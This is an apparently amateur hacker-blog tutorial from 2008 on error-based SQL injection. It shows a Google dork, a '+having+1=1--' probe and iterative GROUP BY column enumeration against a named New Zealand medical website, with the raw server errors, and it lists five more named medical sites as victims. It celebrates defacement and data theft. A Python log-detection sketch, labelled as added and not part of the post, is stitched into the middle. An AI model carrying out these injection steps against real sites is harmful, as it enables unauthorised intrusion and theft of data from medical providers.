|
| SQL INJECTION |
| Tuesday, 08 July 2008 |
Target : http://www.familydoctor.co.nz
Injection Target: http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566
****************************** DESTINATION ******************************
HUNTING : Allinurl:".nz/index.asp?"
Once we've got a victim from good old Google and have one target, open the target site.
Once the target has been found, append the query +having+1=1-- to the end of the target URL. After it is added, it will look like this:
http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566+having+1=1--
After it is submitted, a field name comes out in the error, like this:
**************************************************************** FIELD
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.article_id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/conditions.asp, line 196
**************************************************************** FIELD
Now, if a field comes out like this, it means the site is injectable..!!! Take the field name from the error and feed it back in with another query. Append this to the end of the URL:
+GROUP+BY+<THE FIELD NAME INSIDE THE QUOTES>+having+1=1--
It ends up like this:
http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566 +GROUP+BY+Article.article_id+having+1=1--
After that query is submitted, another field comes out:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.template' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/conditions.asp, line 196
****************************************************************
http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566 +GROUP+BY+Article.article_id,Article.template+having+1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.author_id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/conditions.asp, line 196
****************************************************************
Feed in the field name again; the result:
http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566 +GROUP+BY+Article.article_id,Article.template,Article.author_id+having+1=1--
A field comes out:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.topic' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/conditions.asp, line 196
****************************************************************
Feed in the field name again; the result:
http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566 +GROUP+BY+Article.article_id,Article.template,Article.author_id,Article.topic+having+1=1--
A field comes out:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.content' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/conditions.asp, line 196
Now we have all the fields. The fields obtained on this site:
Article.article_id
Article.template
Article.author_id
Article.topic
Article.content
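Seen from the server side, the procedure above leaves a recognizable trail in the web log: one client sending `having 1=1` requests whose GROUP BY list grows by one column each time, each answered with an error. The following detection sketch is an added example, not part of the original post; the log lines are constructed, and the field order and the assumption that the failed query surfaces as HTTP 500 are mine.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines (not from the page). Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2008-07-08 06:01:10 203.0.113.7 GET /index.asp U=conditions&A=100 200
2008-07-08 06:01:30 198.51.100.9 GET /index.asp U=conditions&A=100+having+1=1-- 500
2008-07-08 06:01:52 198.51.100.9 GET /index.asp U=conditions&A=100+GROUP+BY+T.a+having+1=1-- 500
2008-07-08 06:02:15 198.51.100.9 GET /index.asp U=conditions&A=100+GROUP+BY+T.a,T.b+having+1=1-- 500
2008-07-08 06:02:41 198.51.100.9 GET /index.asp U=conditions&A=100%20GROUP%20BY%20T.a,T.b,T.c%20HAVING%201=1-- 500
2008-07-08 06:03:00 203.0.113.7 GET /search.asp q=having+a+group+by+the+sea 200
"""

HAVING = re.compile(r"\bhaving\s+1\s*=\s*1", re.I)
GROUP_BY = re.compile(r"\bgroup\s+by\s+(.+?)\s+having\b", re.I)

def parse_probe(query):
    """Return number of GROUP BY columns in a HAVING 1=1 probe, or None."""
    decoded = unquote_plus(query)  # handles both '+' and %20 encodings
    if not HAVING.search(decoded):
        return None
    m = GROUP_BY.search(decoded)
    return len([c for c in m.group(1).split(",") if c.strip()]) if m else 0

def find_enumeration(log_text, min_steps=3):
    """Map client IP -> column counts, for clients whose probes keep growing."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # skip lines that do not match the assumed layout
        ip, query, status = parts[2], parts[5], parts[6]
        count = parse_probe(query)
        if count is not None and status == "500":
            probes[ip].append(count)
    flagged = {}
    for ip, counts in probes.items():
        growing = all(b > a for a, b in zip(counts, counts[1:]))
        if len(counts) >= min_steps and growing:
            flagged[ip] = counts
    return flagged

if __name__ == "__main__":
    for ip, counts in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: error-based column enumeration, GROUP BY sizes {counts}")
```

The enumeration only works because the raw ODBC error reaches the browser and the `A` value is concatenated into the SQL text; binding it as a typed parameter and returning a generic error page removes both conditions.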
****************************** SECTOR CLEAR ******************************
Results:
http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566
http://www.ponsonbymedical.co.nz/healthtopics.aspx?C=32074
http://www.ranolfmedical.co.nz/healthtopics.aspx?C=32246
http://kmc.co.nz/HealthTopics.aspx?c=661&p=7
http://www.cshc.co.nz/healthtopics.aspx?C=32553
Pretty easy, isn't it? With this SQL injection, not every site can be defaced. Sometimes when we enter the query, the data we are looking for cannot be accessed, perhaps because the administrator has blocked it. There are also cases where the data we have drained comes out, but when we want to update that data, the SQL injection does not work. So keep fighting and be patient, boss.
Thanks to : - V3NOM - TUKULESTO - KEPARAT - BABAH - IMAM - BLUE SKY - GORONTALO DEFACER CREW - MANADO CODING - INDONESIAN CODER TEAM - And everyone who has shared their knowledge with me, thanks all..!!!!
OF ALL THE SYSTEMS MADE BY HUMANS, THERE IS NONE WHOSE SECURITY SYSTEM CANNOT BE DESTROYED
Label: Hacking Tutorial |
posted by SAINT @ 06.32  |
|
| 1 Comments: |
-
hahahhahah..... Keep hammering away till it goes bust